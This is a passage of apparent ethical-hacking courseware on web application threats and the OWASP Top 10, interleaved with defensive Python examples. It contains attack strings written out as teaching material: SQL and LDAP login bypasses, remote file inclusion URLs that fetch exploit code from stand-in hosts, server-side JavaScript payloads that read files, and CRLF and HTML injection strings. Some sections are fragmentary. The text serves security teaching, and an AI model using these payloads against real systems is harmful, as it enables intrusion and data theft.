Figure 14.3: Web Service Architecture
Characteristics of Web Services

- XML-based: Web services use XML for data representation and transportation. XML usage can avoid OS, networking, or platform binding. Applications that provide web services are highly interoperable.
- Coarse-grained service: In web services, some objects contain a massive amount of information and offer greater functionality than fine-grained services. A coarse-grained service is a combination of multiple fine-grained services.
- Loosely coupled: Web services support a loosely coupled approach for interconnecting systems. The interaction between the systems can occur via the web API by sending XML messages. The web API incorporates a layer of abstraction for the infrastructure to make the connection flexible and adaptable.
- Asynchronous and synchronous support: Synchronous services are called by users who wait for a response, whereas asynchronous services are called by users who do not wait for a response. RPC-based messages and document-based messages are often used for synchronous and asynchronous web services. Synchronous and asynchronous endpoints are implemented using servlets, SOAP/XML, and HTTP.
- RPC support: Web services support remote procedure calls (RPC) similarly to traditional applications.
Types of Web Services

Web services are of two types:

- SOAP web services: The Simple Object Access Protocol (SOAP) defines the XML format. XML is used to transfer data between the service provider and the requester. It also determines the procedure to build web services and enables data exchange between different programming languages.
- RESTful web services: Representational State Transfer (REST) web services are designed to make the services more productive. They use many underlying HTTP concepts to define the services. REST is an architectural approach rather than a protocol like SOAP.

Components of Web Service Architecture:

- UDDI: Universal Description, Discovery, and Integration (UDDI) is a directory service that lists all the services available.

There are other important features/components of the web service architecture, such as WS-Work Processes, WS-Policy, and WS-Security Policy, which play an important role in communication between applications.
Vulnerability Stack
One maintains and accesses web applications through various levels that include custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the security mechanisms or services employed at each layer enable the user to access the web application securely. When considering web applications, the organization considers security as a critical component because web applications are major sources of attacks. The vulnerability stack shows the various layers and the corresponding elements/mechanisms/services that make web applications vulnerable.
Figure 14.4: Vulnerability Stack (Layer 7: custom web applications, with business logic flaws and technical vulnerabilities; Layer 6: third-party components, open source / commercial; Layer 5: database; Layer 4: web server, Apache / Microsoft IIS; Layer 3: operating system, Windows / Linux / OS X; Layer 2: network, router / switch; Layer 1: security, IPS / IDS)
Attackers exploit the vulnerabilities of one or more elements among the seven levels to gain unrestricted access to an application or the entire network.

Layer 7

If an attacker finds vulnerabilities in the business logic (implemented using languages such as .NET and Java), he/she can exploit these vulnerabilities by performing input validation attacks such as XSS.
Layer 6

Third-party components are services that integrate with the website to achieve certain functionality (e.g., Amazon.com targeted by an attacker is the main website; citrix.com is a third-party website).
Layer 1

IDS and IPS raise alarms if any malicious traffic enters a target machine or server. Attackers adopt evasion techniques to circumvent such systems so that they do not trigger any alarm while exploiting the target.
Web Application Threats

Attackers attempt various application-level attacks to compromise the security of web applications to commit fraud or steal sensitive information. This section discusses the various types of threats and attacks against the vulnerabilities of web applications.
OWASP Top 10 Application Security Risks - 2017

Source: https://www.owasp.org
OWASP is an international organization that specifies the top 10 vulnerabilities and flaws of web applications. The latest OWASP top 10 application security risks are as follows:

A1 – Injection

A2 – Broken Authentication

Application functions related to authentication and session management are often implemented incorrectly, thereby allowing attackers to compromise passwords, keys, or session tokens or to exploit other implementation flaws to assume the identities of other users (temporarily or permanently).

A3 – Sensitive Data Exposure

... in transit, as well as special precautions when exchanged with the browser.
A4 – XML External Entity (XXE)

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks such as the billion laughs attack.

A5 – Broken Access Control

Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as accessing other users' accounts, viewing sensitive files, modifying other users' data, and changing access rights.

A6 – Security Misconfiguration

Security misconfiguration is the most common issue in web security, which is due in part to manual or ad hoc configuration (or no configuration at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, and not patching or upgrading systems, frameworks, dependencies, and components in a timely manner (or at all).

A7 – Cross-Site Scripting (XSS)

XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or whenever it updates an existing web page with user-supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface websites, or redirect the user to malicious sites.

A8 – Insecure Deserialization

Insecure deserialization flaws occur when an application receives hostile serialized objects. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered with, or deleted to spoof users, conduct injection attacks, and elevate privileges.

A9 – Using Components with Known Vulnerabilities

A10 – Insufficient Logging and Monitoring
A1 – Injection Flaws

Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access. Such flaws are prevalent in legacy code and are often found in SQL, LDAP, and XPath queries. They can be easily discovered by application vulnerability scanners and fuzzers.

Attackers inject malicious code, commands, or scripts into the input gates of flawed web applications such that the applications interpret and run the newly supplied malicious input, which in turn allows them to extract sensitive information. By exploiting injection flaws in web applications, attackers can easily read, write, delete, and update any data (i.e., relevant or irrelevant to that particular application). There are many types of injection flaws, some of which are discussed below:

- SQL Injection: SQL injection is the most common website vulnerability on the Internet, and it is used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this technique, the attacker injects malicious SQL queries into the user input form either to gain unauthorized access to a database or to retrieve information directly from the database.

- Command Injection: Attackers identify an input validation flaw in an application and exploit the vulnerability by injecting a malicious command into the application to execute arbitrary commands on the host operating system. Thus, such flaws are extremely dangerous.
- LDAP Injection: LDAP injection is an attack method in which websites that construct LDAP statements from user-supplied input are exploited for launching attacks. When an application fails to sanitize the user input, the attacker modifies the LDAP statement with the help of a local proxy. This, in turn, results in the execution of arbitrary commands such as granting access to unauthorized queries and altering the content inside the LDAP tree.
SQL Injection Attacks

SQL injection attacks use a series of malicious SQL queries or SQL statements to directly manipulate the database. Applications often use SQL statements to authenticate users, validate roles and access levels, store and retrieve information for the application and user, and link to other data sources. SQL injection attacks work because the application does not properly validate the input before passing it to an SQL statement. For example, consider the following SQL statement:

SELECT * FROM tablename WHERE UserID = 2302

With a simple SQL injection attack, it becomes the following:

SELECT * FROM tablename WHERE UserID = 2302 OR 1=1

The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. An attacker uses a vulnerable web application to bypass normal security measures and obtain direct access to valuable data. Attackers carry out SQL injection attacks from the web browser's address bar, form fields, queries, searches, and so on.

SQL injection attacks allow attackers to

- Log into the application without supplying valid credentials
- Perform queries against data in the database, often even data to which the application normally would not have access
- Modify database contents or drop the database altogether
- Use the trust relationships established between the web application components to access other databases
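The "OR 1=1" bypass above, as an added example that is not code from the original module: with Python's built-in sqlite3 driver, a lookup and a login check built by string concatenation are compared with the parameterized forms. The users table, its rows, and the column names are constructed sample data; the UserID column follows the statement above.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory users table (not a real application schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (UserID INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(2302, "alice", "Wonderland1"), (2303, "bob", "Builder2")],
    )
    return conn


def find_user_vulnerable(conn, user_id):
    # The request value is pasted into the statement, so "2302 OR 1=1"
    # becomes SQL and the WHERE clause matches every row.
    sql = "SELECT * FROM users WHERE UserID = " + user_id
    return conn.execute(sql).fetchall()


def find_user_safe(conn, user_id):
    # The driver binds the value as data: "2302 OR 1=1" is compared as one
    # literal that no UserID equals, so nothing is returned.
    return conn.execute("SELECT * FROM users WHERE UserID = ?", (user_id,)).fetchall()


def login_vulnerable(conn, username, password):
    # Quoted string fields are just as injectable: a username of
    # alice' OR '1'='1 turns the password check into an OR branch.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    rows = conn.execute(sql).fetchall()
    return rows[0][0] if rows else None


def login_safe(conn, username, password):
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return rows[0][0] if rows else None
```

Binding is the fix; quoting or stripping characters is not, because which characters are dangerous depends on where in the statement the value lands (a numeric context needs no quote at all, as the UserID case shows).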
Figure 14.5: SQL injection attack

Note: For complete coverage of SQL injection concepts and techniques, refer to Module 15 SQL Injection.
Command Injection Attacks

Command injection flaws allow attackers to pass malicious code to different systems via web applications. The attacks include calls to an operating system over system calls, use of external programs over shell commands, and calls to backend databases over SQL. Scripts in Perl, Python, and other languages can be executed and inserted into poorly designed web applications. If a web application uses any type of interpreter, attackers insert malicious code to inflict damage.

To perform various functions, web applications must use operating system features and external programs. Although many programs are invoked externally, a frequently used program is the sendmail program. Carefully scrub an application before passing a piece of information through an HTTP external request. Otherwise, attackers can insert special characters, malicious commands, and command modifiers into the information. The web application then blindly passes these characters to the external system for execution. Inserting SQL commands is a dangerous practice and rather widespread, as it is a command injection method. Command injection attacks are easy to carry out and discover, but they are difficult to understand.

The following are some types of command injection attacks:

- Shell Injection
  - An attacker tries to craft an input string to gain shell access to a web server.
  - Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.
- HTML Embedding
  - This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application.
  - In an HTML embedding attack, the user input to a web script is placed into the HTML output without being checked for HTML code or scripting.

- File Injection
  - The attacker exploits this vulnerability and injects malicious code into system files:

  http://www.certifiedhacker.com/vulnerable.php?COLOR=http://evil/exploit?
Command Injection Example

An attacker enters the following malicious code (account number) with a new password:

Figure 14.6: Command injection attack example
File Injection Attack

<select name="DRINK">
<option value="pepsi">pepsi</option>
<option value="coke">coke</option>
</select>
<input type="submit">

Vulnerable PHP code:

<?php
$drink = 'coke';
if (isset($_GET['DRINK']))
    $drink = $_GET['DRINK'];   // request value used as-is
require($drink . '.php');      // becomes require("http://.../exploit?.php") when DRINK is a URL
?>

To exploit the vulnerable PHP code, the attacker injects a remotely hosted file at www.jasoneval.com, which contains an exploit.

Exploit code:

http://www.certifiedhacker.com/orders.php?DRINK=http://jasoneval.com/exploit?
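An added example covering both the shell-injection and the file-injection cases above (not code from the module): the same greeting is run once through /bin/sh with the request value concatenated into the command line, and once with the value passed as a separate argument, followed by an allow-list lookup for the DRINK parameter so that a value like http://jasoneval.com/exploit never reaches an include. The command, the input string, and the include table are constructed for the demonstration; the block assumes a POSIX shell and an echo binary on the PATH.

```python
import re
import subprocess


def greet_vulnerable(name):
    """Concatenates request input into a command line and hands it to /bin/sh,
    so shell metacharacters (; | ` $( )) inside the input are interpreted."""
    result = subprocess.run("echo Hello " + name, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def greet_safe(name):
    """Passes the input as one argv element: no shell parses it, so a ';'
    is just a character inside the argument."""
    result = subprocess.run(["echo", "Hello", name],
                            capture_output=True, text=True)
    return result.stdout


_SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def validate_name(name):
    """Allow-list check for values that must end up on a command line at all."""
    if not _SAFE_NAME.fullmatch(name):
        raise ValueError("rejected input: " + repr(name))
    return name


# Constructed mapping for the DRINK=... example: the parameter selects a key,
# never a file name, so remote URLs and ../ sequences have nowhere to go.
ALLOWED_INCLUDES = {"pepsi": "pepsi.php", "coke": "coke.php"}


def resolve_include(param):
    try:
        return ALLOWED_INCLUDES[param]
    except KeyError:
        raise ValueError("unknown include: " + repr(param)) from None
```

The argv form removes the shell from the path entirely; the allow-list is still worth keeping in front of it, because the invoked program may parse its own arguments (option injection such as a leading "-" is a separate problem that argv alone does not solve).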
LDAP Injection Attacks

LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. The Lightweight Directory Access Protocol (LDAP) is based on the client-server model, and clients can search the directory entries using filters.
An LDAP injection attack works in the same way as an SQL injection attack, but it exploits user parameters to generate an LDAP query. LDAP runs on an Internet transport such as TCP, and it is an open-standard protocol for manipulating and querying Directory Services. An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services, to obtain direct access to the databases behind an LDAP tree.

LDAP attacks exploit web-based applications constructed based on LDAP statements using a local proxy. Web applications may use user-supplied input to create custom LDAP statements for dynamic web page requests. Attackers commonly perform LDAP injection attacks on web applications employing user inputs to generate LDAP queries. The attackers can use the search filter attributes to discover the underlying LDAP query structure. Using this structure, the attacker includes additional attributes in the user-supplied input to determine whether the application is vulnerable to LDAP injection and evaluates the web application's output.

Depending on the implementation of the target, attackers use LDAP injection to achieve

- Login bypass
- Information disclosure
- Privilege escalation
- Information alteration

Example:

To test if an application is vulnerable to LDAP code injection, send a query to the server that generates an invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques.

Account Login
Username: certifiedhacker)(&))
Password: blah

Figure 14.8: LDAP injection attack example

If an attacker enters a valid username "certifiedhacker" and injects certifiedhacker)(&)), then the URL string becomes (&(USER=certifiedhacker)(&))(PASS=blah)). The LDAP server processes only the first filter; only the query (&(USER=certifiedhacker)(&)) is processed. Because the empty AND filter (&) is always true, this query is always true, and the attacker logs into the system without a valid password.

An important defense method against such attacks is to filter all inputs to the LDAP; otherwise, vulnerabilities in LDAP allow the execution of unauthorized queries or modification of its contents. When the attacker modifies the LDAP statements, the process runs with the same permissions as the component of the web application that executed the command.
Other Injection Attacks

Some other types of injection attacks are discussed below:

Server-Side JS Injection

Server-side JavaScript injections are vulnerabilities that manifest when an application dynamically integrates user-controllable values into a string that the code interpreter evaluates. Attackers exploit improper validation of user data and pass arbitrary values to alter the code that will be compiled and executed by the server. These vulnerabilities also allow attackers to compromise the functionality and data of the applications hosted by the server. Attackers can also use the server as a source to launch further attacks in the target network.

Example of server-side JavaScript injection:

Attackers can launch a DoS attack by passing the following command to the eval() function:

while(1)

This command forces the server's event loop to use the complete processor time and restricts it from evaluating additional inputs until the process is reinitiated.

Attackers can also read files' content from the server. The following commands can display the content of the current and parent directories:

res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readdirSync('..').toString())

After retrieving the file names, attackers can pass the following command to read the content inside the file:
res.end(require('fs').readFileSync(filename))

This vulnerability can be exploited further by initiating and running malicious binary files using the fs and child_process modules.

Server-Side Includes Injection

Server-side Includes is an application feature that helps designers to auto-generate the content of the web page without manual involvement. The # directives allow developers to perform this activity. These directives can be files, CGI variables, shell commands, etc. After evaluating all the directives, the HTML is delivered to the requester. Typical directives include:

<!--#include virtual="/footer.html" -->
<!--#echo var="DATE_LOCAL" -->
Server-Side Template Injection

While creating dynamic pages, designers or developers use template engines to segregate programming logic from data presentation. Thus, instead of storing code that accepts requests and extracts the required information from the database and passes it to users in a monolithic data file, template engines are employed to segregate the presentation of the data from the remaining code.

Server-side template injection occurs when users are allowed to insert unsafe inputs into a server-side template that evaluates them. When this vulnerability exists, attackers can inject malicious template directives to run arbitrary code and gain complete control over the target web server. This injection is similar to XSS but is often employed to target server internals and achieve remote code execution, making every vulnerable application a primary target. Template injection manifests via designers' code errors and deliberate template disclosure while showcasing rich features of applications, blogs, etc.

For example, consider the following complex PHP and HTML code:

<html>
<head>
<title>{{title}}</title>
</head>
<body>
<form method="{{method}}" action="{{action}}">
<p><input type="text" name="username" value="{{username}}"></p>
</form>
</body>
</html>

Replace the abovementioned code using template engines as follows:

$templateEngine = new TemplateEngine();
$template = $templateEngine->loadFile('signUp.tpl');
$template->assign('title', 'login');
$template->assign('method', 'post');
$template->assign('action', 'signup.php');
$template->assign('username', getUsernameFromCookie());   // attacker-controlled value
$template->assign('time', microtime(true));
$template->show();

The abovementioned code is vulnerable to template injection as the engine can execute native functions. If attackers are able to get template expressions into the template (for instance through the cookie-supplied username), they can run arbitrary functions and gain access to the target web server.
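The same failure mode as an added example in Python (not the module's code): str.format is a small template language whose {0.attr} syntax walks object attributes, so building the template string from request input lets the attacker write expressions, while keeping the template a fixed literal and passing the input as a value does not. The Account class and its token are constructed sample data.

```python
class Account:
    """Constructed context object handed to the template; the token is sample data."""

    def __init__(self, name, api_token):
        self.name = name
        self.api_token = api_token


def render_vulnerable(display_name, account):
    """The request value becomes part of the template source, so template
    syntax inside it is evaluated against the context object. An attacker can
    also go further than one attribute, e.g. {0.__init__.__globals__}."""
    template = "Welcome " + display_name + "!"
    return template.format(account)


def render_safe(display_name, account):
    """The template is a fixed literal; the request value is only ever a
    substituted value and is never re-parsed as template source."""
    template = "Hello {0.name}, you said: {1}"
    return template.format(account, display_name)


def looks_like_template_syntax(value):
    """Cheap detection for logging or alerting: braces open expressions in
    str.format, Jinja2, Twig and Smarty alike."""
    return "{" in value or "}" in value
```

The distinction carries over to any engine: a value assigned to a template variable is data, a value concatenated into the template file (or into a string later passed to render_template_string, eval-style) is code.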
Log Injection

Attackers launch log injection attacks by exploiting unsanitized or unvalidated inputs to application logs. Applications usually store a large number of logs such as access logs, transaction logs, monitor logs, exception or error logs, GC logs, and crash logs. If an application fails to log users' or its administrator's events or actions in a secure manner, attackers could insert fake entries or records to corrupt the log file. Attackers use this technique to insert misleading information in the log file for covering their tracks in the event of a successful attack.

For instance, consider an application that logs data in the following format:

Date, Time, Username, ID, Source IP, Request

The unvalidated input parameters come directly from the request:

Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3; username: xyz; id=

Attackers can manipulate the id parameter to save the log with fake inputs:

Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3; username: xyz; id=\r\n(Fake input)

If the log fails to escape null bytes, the remainder of the string is not recorded. For example:

Cookie: PHPSESSID=pltmplobqfig09bs9gfeersju3; username: xyz; id=400
HTML Injection

In HTML injection, the attacker supplies HTML markup in an input (here, a search query) that the application reflects into a page without encoding it.

User query:

</h2>special offer <a href=www.certifiedhacker.com>malicious link</a><h2>

Resulting page following HTML injection:

<html>
<h1> Results matching the given query: </h1>
<h2></h2>special offer <a href=www.certifiedhacker.com>malicious link</a><h2></h2>
<ol> <li> Result A
<li> Result B </ol>
</html>

However, the attacker aims to include HTML code in a page that other users visit. For this purpose, the code injection should be included in page content that is intended to be viewed by end users. The injection occurs if applications save untrusted user inputs and disclose the data to other users. For instance, assume that the abovementioned application consists of a page showing the users' search history:

Code snippet (application template) for the search history page:
<html>
<h1> Recent search history: </h1>
<ol> <li><h2> (user_query_1) </h2>
<li><h2> (user_query_2) </h2></ol>
</html>

Resulting search history page following HTML injection:

<html>
<h1> Recent search history: </h1>
<ol>
<li><h2> Top 10 thriller movies </h2>
<li><h2></h2>special offer <a href=www.certifiedhacker.com>malicious link</a><h2></h2>
</ol> </html>

Now, every search history page that a user views will display a malicious link generated by the attacker. If any user is attracted to the link and opens it, he/she will be viewing content generated from the attacker's domain, and any credentials entered on that page are exfiltrated to the attacker.
CRLF Injection

In a carriage return line feed (CRLF) injection attack, attackers inject carriage return (\r) and line feed (\n) characters into the user's input to trick the web server, web application, or user into believing that the current object is terminated and a new object has been initiated. CRLF injection is a vulnerability that manifests when a user enters CRLF characters into an application. These characters signify the end of the line for different Internet protocols, which, when combined with HTTP request/response headers, can lead to various vulnerabilities such as HTTP request smuggling and response splitting.

HTTP request smuggling can occur when an HTTP request is transmitted via a server, which serves as a proxy to validate and forward the request to the next server. Such vulnerabilities can also lead to further attacks such as cache poisoning, firewall security breach, and request hijacking.

In HTTP response splitting, attackers can include arbitrary HTTP headers for the HTTP response to split the response headers and body. It results in delivering two responses instead of one, which can lead to further vulnerabilities such as cross-site scripting.

Consider the following example of CRLF injection in log files:

Suppose that the admin panel has a log file with the IP, time, and URL path of the visited site as follows:

10.10.10.10 - 09:25 - /index.php?page=about

If an attacker can embed CRLF characters into the HTTP request, then he/she can change the output flow and can enter fake log entries. Furthermore, the attacker can alter the web application response as follows:

/index.php?page=about%0d%0a127.0.0.1 - 09:25 - /index.php?page=home&restrictedaction=edit

Here, %0d and %0a are the URL-encoded CR and LF characters. After injecting the CRLF characters, the log entries appear as follows:

10.10.10.10 - 09:25 - /index.php?page=about
127.0.0.1 - 09:25 - /index.php?page=home&restrictedaction=edit
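The forged log record above, as an added example that is not code from the module: the same access-log writer is shown once writing request fields verbatim and once escaping CR, LF and NUL, and a small reader splits the result into records the way a reviewer or SIEM parser would. This also covers the log-injection case earlier in this section, where the id parameter carried \r\n. The log format and the attack path are taken from the text; the escaping scheme is an assumption for the demonstration.

```python
import urllib.parse


def sanitize_for_log(value):
    """Escape the characters that start a new record (CR, LF) or truncate one
    (NUL) so that injected text stays inside the field it was written to."""
    return (value.replace("\\", "\\\\")
                 .replace("\r", "\\r")
                 .replace("\n", "\\n")
                 .replace("\x00", "\\0"))


def log_entry_vulnerable(ip, when, path):
    """Writes request fields verbatim: a CRLF in the path becomes a record boundary."""
    return ip + " - " + when + " - " + path + "\n"


def log_entry_safe(ip, when, path):
    return (sanitize_for_log(ip) + " - " + sanitize_for_log(when)
            + " - " + sanitize_for_log(path) + "\n")


def records(log_text):
    """Split a log the way a reviewer or a SIEM parser does: one record per line."""
    return [line for line in log_text.split("\n") if line]


# Constructed request path: the URL-decoded form of the CRLF payload in the text above.
ATTACK_PATH = urllib.parse.unquote(
    "/index.php?page=about%0d%0a127.0.0.1 - 09:25 - /index.php?page=home&restrictedaction=edit"
)
```

Structured logging (one JSON object per line, with the framework doing the quoting) achieves the same result without a hand-written escaper and additionally survives fields that legitimately contain the separator.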
A2 – Broken Authentication

Authentication and session management includes every aspect of user authentication and management of active sessions. At present, web applications implementing solid authentication fail because of weak credential functions such as "change my password," "forgot my password," "remember my password," "account update," and so on. Therefore, developers must take the utmost care to implement user authentication securely. It is always better to use strong authentication methods through special software- and hardware-based cryptographic tokens or biometrics. An attacker exploits vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.

- Session ID in URLs

Example: A web application creates a session ID for the respective login when a user logs into http://certifiedhackershop.com. An attacker uses a sniffer to sniff the cookie that contains the session ID or tricks the user into giving away the session ID. The attacker now enters the following URL in his browser's address bar:

http://certifiedhackershop.com/sale/saleitems=304;jsessionid=2OMTOIDPXMOOQSABGCKLHCJUN2IV?dest=NewMexico

This redirects him to the already logged-in page of the victim. The attacker successfully impersonates the victim.
- Password Exploitation

Attackers can identify passwords stored in databases because of weak hashing algorithms. Attackers can gain access to the web application's password database if user passwords are not properly hashed, which allows the attacker to exploit every user's password.

- Timeout Exploitation

If an application's session timeouts are set to longer durations, the sessions will last until the time specified, i.e., the session will be valid for a longer period. When the user closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later to conduct the attack, as session IDs can remain valid; thus, they can exploit the user's privileges.

Example: A user logs in to www.certifiedhacker.com using his/her credentials. After performing certain tasks, he/she closes the web browser without logging out of the page. The web application's session timeout is set to two hours. During the specified session interval, if an attacker has physical access to the user's system, he may then launch the browser, check the history, and click the www.certifiedhacker.com link, which automatically redirects him to the user's account without the need to enter the user's credentials.
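The timeout case above, as an added example that is not code from the module: a server-side session store that enforces both an idle timeout and an absolute lifetime, so the two-hour window in the example shrinks to fifteen minutes of inactivity, and whose IDs are random rather than anything an attacker could derive from a URL. The timeout values and user names are constructed for the demonstration.

```python
import secrets
import time


class SessionStore:
    """Server-side sessions with an idle timeout and an absolute lifetime.
    The defaults are constructed values; real limits depend on the application."""

    def __init__(self, idle_timeout=15 * 60, absolute_timeout=8 * 60 * 60):
        self.idle_timeout = idle_timeout
        self.absolute_timeout = absolute_timeout
        self._sessions = {}

    def create(self, user, now=None):
        """Issue a fresh, unguessable ID at login (never reuse a pre-login ID)."""
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def validate(self, sid, now=None):
        """Return the user for a live session, or None; an expired session is
        destroyed on first sight so a later request cannot revive it."""
        now = time.time() if now is None else now
        s = self._sessions.get(sid)
        if s is None:
            return None
        idle_expired = now - s["last_seen"] > self.idle_timeout
        life_expired = now - s["created"] > self.absolute_timeout
        if idle_expired or life_expired:
            del self._sessions[sid]
            return None
        s["last_seen"] = now
        return s["user"]

    def logout(self, sid):
        """Explicit logout invalidates server-side state, not just the cookie."""
        self._sessions.pop(sid, None)
```

The absolute lifetime is what bounds the damage when a user keeps a session active from a shared machine; the idle timeout is what closes the window in the walk-up scenario described above.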
3 -
SensitiveData Exposure
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information in a database or on a file system. If users do not maintain proper security of their storage locations, then the application may be at risk, as attackers can access the storage and misuse the information.
The screenshots below show poorly encrypted vulnerable code and secure code that is properly encrypted using a secure cryptographic algorithm.
Figure 14.9: Vulnerable code example
Figure 14.10: Secure code example
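The two screenshots are not reproduced on this page, so the following added example (not the courseware's code) stands in for them with the most common case of password storage: an unsalted fast digest next to a salted, memory-hard key derivation with constant-time verification. The password value and the scrypt cost parameters are constructed for the demonstration.

```python
import hashlib
import hmac
import os

# Weak pattern the vulnerable screenshot stands for: one fast, unsalted digest of the password.
# Identical passwords give identical hashes, so a precomputed table breaks every user at once.
def weak_store(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


# Hardened pattern: random per-user salt, slow memory-hard KDF, parameters stored with the hash
# so they can be raised later without breaking existing records.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2**14, 8, 1      # assumed cost parameters; tune to your hardware


def secure_store(password: str) -> str:
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${digest.hex()}"


def secure_verify(password: str, stored: str) -> bool:
    algo, n, r, p, salt_hex, digest_hex = stored.split("$")
    if algo != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p), dklen=32)
    # compare_digest avoids leaking how many leading bytes matched through timing
    return hmac.compare_digest(digest.hex(), digest_hex)


def demo() -> dict:
    """Two users choosing the same (constructed) password, stored both ways."""
    pw = "Winter2020!"
    h1, h2 = secure_store(pw), secure_store(pw)
    return {
        "weak_hashes_collide": weak_store(pw) == weak_store(pw),   # same for every user
        "secure_hashes_differ": h1 != h2,                           # salt makes each record unique
        "secure_verify_ok": secure_verify(pw, h1),
        "secure_verify_wrong": secure_verify("winter2020!", h1),
    }
```

Note that "encrypted" in the text above is, for passwords, really a one-way hash: the application never needs the plaintext back, only to check a candidate against the stored record.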
A4 - XML External Entity (XXE)
An XML External Entity attack is a Server-side Request Forgery (SSRF) attack whereby an application can parse XML input from an unreliable source because of the misconfigured XML parser. In this attack, an attacker sends a malicious XML input containing a reference to an external entity to the victim's web application. When this malicious input is processed by a weakly configured XML parser of the target web application, it enables the attacker to access protected files and services from servers or connected networks.
Since XML features are widely available, the attacker abuses these features to create documents or files dynamically at the time of processing. Attackers tend to make the most of this attack, as it allows them to retrieve confidential data, perform DoS attacks, and obtain sensitive information via HTTP(S); in some worst-case scenarios, they may even be able to perform remote code execution or launch a CSRF attack on any vulnerable service.
According to the XML 1.0 standard, XML uses entities, often defined as storage units. Entities are special features of XML that can access local or remote contents, and they are defined anywhere in a system via system identifiers. The entities need not be part of an XML document, as they can come from an external system as well. The system identifiers that act as a URI are used by the XML processor while processing the entity. The XML parsing process replaces these entities with their actual data, and here, the attacker exploits this vulnerability by forcing the XML parser to access the file or the contents specified by him/her. This attack may be more dangerous as a trusted application's processing of XML documents can be abused by the attacker to pivot to the internal system to acquire all sorts of internal data of the system.
For example, the attacker sends the following code to extract the system data from the vulnerable target.
Figure: Malicious request sent to a web application with a weakly configured XML parser
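The figure's request is not reproduced on this page; the defence is the same regardless of its payload: a parser that never resolves a DTD or an entity. The following is an added example (not from the courseware) using the standard-library expat parser, which rejects any DOCTYPE or entity declaration before a single external reference can be resolved. Both XML samples are constructed; the file path in the hostile one is a placeholder.

```python
import xml.parsers.expat


class XXEAttempt(ValueError):
    """Raised when untrusted XML carries a DTD or an entity declaration."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse a flat XML record into {tag: text}, refusing any DOCTYPE/ENTITY construct.

    Untrusted input never needs a DTD, so the safest policy is to fail on sight of one
    rather than try to distinguish harmless from hostile declarations."""
    parser = xml.parsers.expat.ParserCreate()
    result, path = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XXEAttempt(f"DOCTYPE declaration not allowed (root {name!r})")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise XXEAttempt(f"entity declaration not allowed ({name!r})")

    def on_external_ref(context, base, system_id, public_id):
        return 0          # never fetch external resources; returning 0 fails the parse

    def on_start(tag, attrs):
        path.append(tag)

    def on_end(tag):
        path.pop()

    def on_text(text):
        if path and text.strip():
            result[path[-1]] = result.get(path[-1], "") + text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return result


# Constructed inputs: a normal order record, and one whose DTD declares an external entity
# pointing at a server-side file (the path is a placeholder, not a real target).
BENIGN = b"<order><item>304</item><dest>NewMexico</dest></order>"
HOSTILE = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE order [<!ENTITY ext SYSTEM "file:///placeholder/path/on/server">]>'
           b"<order><item>&ext;</item></order>")


def check(data: bytes) -> str:
    """Classify an input the way an application boundary would log it."""
    try:
        parse_untrusted_xml(data)
        return "accepted"
    except XXEAttempt:
        return "rejected"
```

Because the DOCTYPE handler raises before the document body is reached, the entity reference is never even seen, and the server makes no file or network access on the attacker's behalf.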
A5 - Broken Access Control
considerably difficult.
A6 - Security Misconfiguration
